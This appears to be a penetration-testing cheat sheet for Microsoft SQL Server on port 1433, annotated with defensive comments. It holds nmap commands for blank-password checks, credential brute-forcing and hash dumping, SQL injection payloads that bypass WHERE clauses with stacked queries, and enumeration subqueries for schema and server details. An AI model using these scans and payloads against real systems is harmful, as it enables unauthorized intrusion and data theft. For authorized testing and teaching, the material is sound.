
1433 - Pentesting MSSQL

Enumeration

# Nmap NSE enumeration of the MSSQL instance on 1433; $IP is the target host.
# The script-args authenticate as sa with an empty password (mssql.password=), i.e. a blank-sa check.
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 $IP
# ms-sql-brute tries each user/password pair from the two wordlists; this produces a burst of failed
# logins, which is exactly what SQL Server login-failure auditing is meant to surface.
nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt $IP

Bypassing a SQL WHERE clause

Example query

-- Injectable pattern: {USER_PAYLOAD} is concatenated straight into the WHERE clause, so the caller
-- controls the predicate structure, not just a value. The fix is a parameterized query: a bound value
-- can only be compared, it can never alter the clause. ("user id" as written is presumably user_id;
-- an unquoted identifier with a space is not valid T-SQL.)
Select * from users WHERE user id = 1 AND {USER_PAYLOAD} AND user_type = 'not_admin';
Bypass examples
-- Each line is a value for {USER_PAYLOAD} in the query above. The trailing "--" turns the rest of the
-- original statement, including the user_type = 'not_admin' filter, into a comment, which is why the
-- remedy is binding values rather than appending predicates. The last three also close a parenthesis
-- and append a second statement, so they depend on stacked-query execution being available.
1=1 OR 1=1 -- lorem ipsum
'1'='1' OR '1'='1' -- lorem ipsum
2>1 OR 2>1 -- lorem upsum
1=1); select * from users; -- lorem ipsum
'1'='1'); select * from users; -- lorem ipsum
2>1); select * from users; -- lorem ipsum

Useful queries

databases

-- Database names from master.dbo.sysdatabases, collapsed into one comma-separated string so that a
-- single-value injection point returns them all. These enumeration subqueries execute as the login the
-- application connects with, so a least-privilege login bounds what they can reveal.
(select TOP 1 STRING_AGG(CONVERT(NVARCHAR(max), name), ',') from master.dbo.sysdatabases) 
tables
-- Table names, but sourced from INFORMATION_SCHEMA.COLUMNS, so each table name repeats once per
-- column; INFORMATION_SCHEMA.TABLES is the one-row-per-table view.
(select TOP 1 STRING_AGG(CONVERT(NVARCHAR(max), TABLE_NAME), ',') from INFORMATION_SCHEMA.COLUMNS)
columns
-- Column names of the table called 'users'. The three-part name scopes this to the msdb database,
-- unlike the previous query, which reads the current database.
(select TOP 1 STRING_AGG(CONVERT(NVARCHAR(max), COLUMN_NAME), ',') from msdb.INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users') 
routines
-- Names of stored procedures and functions (INFORMATION_SCHEMA.ROUTINES) in the current database.
(select TOP 1 STRING_AGG(CONVERT(NVARCHAR(max), ROUTINE_NAME), ',') from INFORMATION_SCHEMA.ROUTINES)
functions
-- Built-in metadata functions; each returns a single value describing the session, the database or
-- the server, so each fits a single-value injection point.
(Select APP_NAME())
(Select DB_ID())
(Select DB_NAME())
(Select ORIGINAL_DB_NAME())
(Select SCHEMA_ID())
(Select SCHEMA_NAME()) 
(Select SCOPE_IDENTITY())  
-- NOTE(review): VERSION() is not a T-SQL built-in; on SQL Server the version string comes from
-- @@VERSION or from SERVERPROPERTY('ProductVersion') below.
(Select VERSION())
-- SERVERPROPERTY(...) returns instance configuration and build details (edition, default paths,
-- clustering/HA state). ProductVersion/ProductLevel/ProductUpdateLevel give the patch level an exposed
-- instance is judged by, which is why keeping the build current matters as much as access control.
(Select SERVERPROPERTY('BuildClrVersion'))
(Select SERVERPROPERTY('Collation'))  
(Select SERVERPROPERTY('CollationID'))  
(Select SERVERPROPERTY('ComparisonStyle'))  
(Select SERVERPROPERTY('ComputerNamePhysicalNetBIOS'))  
(Select SERVERPROPERTY('Edition'))  
(Select SERVERPROPERTY('EditionID'))  
(Select SERVERPROPERTY('EngineEdition'))  
(Select SERVERPROPERTY('FilestreamConfiguredLevel'))  
(Select SERVERPROPERTY('FilestreamEffectiveLevel'))  
(Select SERVERPROPERTY('FilestreamShareName'))  
(Select SERVERPROPERTY('HadrManagerStatus'))  
(Select SERVERPROPERTY('InstanceDefaultBackupPath'))  
(Select SERVERPROPERTY('InstanceDefaultDataPath'))  
(Select SERVERPROPERTY('InstanceDefaultLogPath'))  
(Select SERVERPROPERTY('InstanceName'))  
(Select SERVERPROPERTY('IsAdvancedAnalyticsInstalled'))  
(Select SERVERPROPERTY('IsBigDataCluster'))  
(Select SERVERPROPERTY('IsClustered'))  
(Select SERVERPROPERTY('IsExternalAuthenticationOnly'))  
(Select SERVERPROPERTY('IsFullTextInstalled'))  
(Select SERVERPROPERTY('IsHadrEnabled'))  
(Select SERVERPROPERTY('IsIntegratedSecurityOnly'))  
(Select SERVERPROPERTY('IsLocalDB'))  
(Select SERVERPROPERTY('IsPolyBaseInstalled'))  
(Select SERVERPROPERTY('IsServerSuspendedForSnapshotBackup'))  
(Select SERVERPROPERTY('IsSingleUser'))  
(Select SERVERPROPERTY('IsTempDbMetadataMemoryOptimized'))  
(Select SERVERPROPERTY('IsXTPSupported'))  
(Select SERVERPROPERTY('LCID'))  
(Select SERVERPROPERTY('LicenseType'))  
(Select SERVERPROPERTY('MachineName'))  
(Select SERVERPROPERTY('NumLicenses'))  
(Select SERVERPROPERTY('PathSeparator'))  
(Select SERVERPROPERTY('ProcessID'))  
(Select SERVERPROPERTY('ProductBuild'))  
(Select SERVERPROPERTY('ProductBuildType'))  
(Select SERVERPROPERTY('ProductLevel'))  
(Select SERVERPROPERTY('ProductMajorVersion'))  
(Select SERVERPROPERTY('ProductMinorVersion'))  
(Select SERVERPROPERTY('ProductUpdateLevel'))  
(Select SERVERPROPERTY('ProductUpdateReference'))  
(Select SERVERPROPERTY('ProductVersion'))  
(Select SERVERPROPERTY('ResourceLastUpdateDateTime'))  
(Select SERVERPROPERTY('ResourceVersion'))  
(Select SERVERPROPERTY('ServerName'))  
(Select SERVERPROPERTY('SqlCharSet'))  
(Select SERVERPROPERTY('SqlCharSetName'))  
(Select SERVERPROPERTY('SqlSortOrder'))  
(Select SERVERPROPERTY('SqlSortOrderName'))  
(Select SERVERPROPERTY('SuspendedDatabaseCount'))